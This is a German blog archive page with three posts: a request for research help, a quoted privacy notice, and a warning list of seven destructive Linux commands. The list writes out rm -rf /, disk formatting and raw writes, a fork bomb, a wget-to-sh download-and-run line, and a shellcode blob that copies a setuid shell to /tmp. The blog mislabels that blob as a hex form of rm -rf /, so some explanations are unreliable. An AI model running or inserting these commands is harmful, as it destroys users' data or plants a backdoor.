Artikel mit ‘unsicher’ getagged

Hilfe!?

Mittwoch, 01. Juli 2009

Ich suche jemanden, der mich vielleicht ein bisschen im Punkt “Forschung” ein bisschen unterstützen möchte. Ich bin auch gerne bereit anfänglich unter die Arme zu greifen und Tipps/Tricks und ein paar Geheimnisse zu verraten. Bei Interesse bitte bei mir melden. pakon[3t]pakon.de

Datenschutz! Welcher Datenschutz?

Freitag, 26. Dezember 2008

Ich greife mal auf einen Blogeintrag von meinem Kumpel Stephan zurück:

 

Einverständnis

[…]Die online erfassten Formulare werden zur weiteren Verarbeitung per E-Mail ohne zusätzliche Verschlüsselungstechniken an VICTORVOX/MoobiCent weitergeleitet. Wir möchten Sie darauf hinweisen, dass per E-Mail versendete Informationen unter Umständen während der Übermittlung von Daten eingesehen werden könnten. Aus diesem Grund sollten Sie sicherheitshalber keine persönlichen Kennwörter, die Sie bereits in anderen Bereichen oder Online-Diensten verwenden, in die Online-Formulare eingeben, sondern stattdessen völlig neue Kennwörter verwenden.[…] http://www.moobicent.de/popup/datenschutz/
 

Leider wird dies in vielen Firmen so gehandhabt, ob wir möchten oder nicht!

Link zum Blogeintrag von Stephan
 

Somit einen guten Rutsch ins neue Jahr!

7 tödliche Linux Kommandos

Samstag, 22. November 2008

Diese sieben Kommands, welche Jun Auza in seinem Blog postet sollte man lieber nicht ausführen, wieso ist beim jeweiligem Kommando zu finden.

1. Code:


rm -rf /
This command will recursively and forcefully delete all the files inside the root directory.

2. Code:

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68”
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99”
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7”
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56”
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31”
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69”
“\x6e\x2f\x73\x68\x00\x2d\x63\x00”
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

This is the hex version of [rm -rf /] that can deceive even the rather experienced Linux users.

3. Code:

mkfs.ext3 /dev/sda

This will reformat or wipeout all the files of the device that is mentioned after the mkfs command.

4. Code:

:(){:|:&};:

Known as forkbomb, this command will tell your system to execute a huge number of processes until the system freezes. This can often lead to corruption of data.

5. Code:

any_command > /dev/sda

With this command, raw data will be written to a block device that can usually clobber the filesystem resulting in total loss of data.

6. Code:

wget http://some_untrusted_source -O- | sh

Never download from untrusted sources, and then execute the possibly malicious codes that they are giving you.

7. Code:

mv /home/yourhomedirectory/* /dev/null

This command will move all the files inside your home directory to a place that doesn’t exist; hence you will never ever see those files again.

There are of course other equally deadly Linux commands that I fail to include here, so if you have something to add, please share it with us via comment.